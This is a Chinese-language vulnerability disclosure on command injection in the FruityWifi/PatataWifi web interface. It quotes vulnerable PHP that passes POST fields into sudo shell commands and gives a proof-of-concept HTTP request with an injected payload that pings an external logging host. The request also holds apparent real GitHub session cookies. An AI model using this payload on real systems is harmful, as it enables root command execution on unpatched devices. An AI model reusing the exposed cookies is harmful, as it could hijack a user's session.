无线安全审计工具FruityWifi 多处命令执行漏洞

Posted 2021-01-06

FruityWIfi是一款有名的无线安全审计的开源工具，其灵感来自于wifipineapple，目前该工具已经更新到2.4。它能够让用户通过web界面来控制和管理模块，十分方便。FriutyWifi最初的设想是能够在树莓派上使用，但是也可以安装在Debian系列的操作系统上，例如Debian，kali Linux等，甚至可以安装在NetHunter上，在某些移动设备上使用。 详细介绍和使用看这里http://www.freebuf.com/articles/wireless/157559.html

github：https://github.com/PatatasFritas/PatataWifi
issues：https://github.com/PatatasFritas/PatataWifi/issues/1

script/config_iface.php 文件

<?
include_once dirname(__FILE__)."/../config/config.php";
require_once WWWPATH."/includes/login_check.php";
require_once WWWPATH."/includes/filter_getpost.php";
include_once WWWPATH."/includes/functions.php";
// ------------ IN | OUT (START) -------------
if(isset($_POST[‘io_mode‘])){
    $exec = "/bin/sed -i ‘s/io_mode=.*/io_mode=\"".$_POST[‘io_mode‘]."\";/g‘ ../config/config.php";
    exec_fruitywifi($exec);
}

看这里执行的代码是通过 exec_fruitywifi 函数执行的，这个函数在 functions.php里面，如下代码：

function exec_fruitywifi($exec) {
    $bin_exec = "/usr/bin/sudo";
    exec("$bin_exec sh -c "$exec"", $output);
    //exec("$bin_exec sh -c "$exec" 2>&1", $output); //DEBUG SHOW ERRORS (da problemas cuando se usa para ejecutar un servicio)
    //LOG
    $rs = fopen(LOGPATH."/exec.log", ‘a‘);
    fwrite($rs, date("Y-m-d H:i:s")." - "."$bin_exec sh -c "$exec"
");
    if(is_array($output) and array_key_exists(0, $output)) {
        fwrite($rs, "	".$output[0]."

");
    } elseif (is_string($output)) {
        fwrite($rs, "	".$output."

");
    }
    fclose($rs);
    return $output;
}

可以看到使用exec直接拼接执行了代码。

poc如下：

POST /script/config_iface.php HTTP/1.1
Host: 192.168.8.150
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1305686839.1530540055; _octo=GH1.1.1160558809.1530540055; tz=Asia%2FShanghai; user_session=G3Lilv5ed8uCKk3xwZs5K_qD6izdAtXukNtPndcLr0ShNo8j; __Host-user_session_same_site=G3Lilv5ed8uCKk3xwZs5K_qD6izdAtXukNtPndcLr0ShNo8j; logged_in=yes; dotcom_user=ly55521; has_recent_activity=1; _gh_sess=MWl5N0NXckk5ekF0TTEzQXEwYUZaMVdaOGFDdWVjbitiMTFqNzJXK0piNmpLTlg4OTJRMHVhQUJrVHRVenNlQ09aUnBIaFJyN2JoNmFBZXdJK1ZVMzRqQXRBTjlRZzdSVFcydUIrTWtrMHhnaWUzRjJlQk9yVGpTSkdkcVJncDh3a0tRR0pWVWlMNkw5Q2QxLzY2T3JDbEo2b1FjTm90WHB0MS94bHNJYmNZTHhaYmllNzMySEVDZWxtTUxYNCtKQzlqRjRVWlJvOUJ5cFFKL3RLRGRpak1rdGZva2M5SnVDekt6N1JpSmVpdHVGMy9aMTFJbkk1eDlnUXAvNm5CTTVjS1dqSmlUbHFhTXc4WExyWnZuQTFXcnBpMHA1OEp3VnBGdWlMSWtTWVk9LS1VTDViV1pMeFNMaGxMUE5lWDg5M1FRPT0%3D--ec33e4803fc050592008c1eebd9fb22483774002
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

io_mode=123%26‘%600%26ping%203.t00ls.fc7853eedebcc14a39700d54c9b8acca.tu4.org.%26%60‘

可以收到ping请求。

再看 page_config.php 文件的 82/84行，同样存在命令执行漏洞。

$hostapd_ssid=$_POST[‘newSSID‘];
exec_fruitywifi("sed -i ‘s/hostapd_ssid=.*/hostapd_ssid=\"".$_POST[‘newSSID‘]."\";/g‘ ./config/config.php");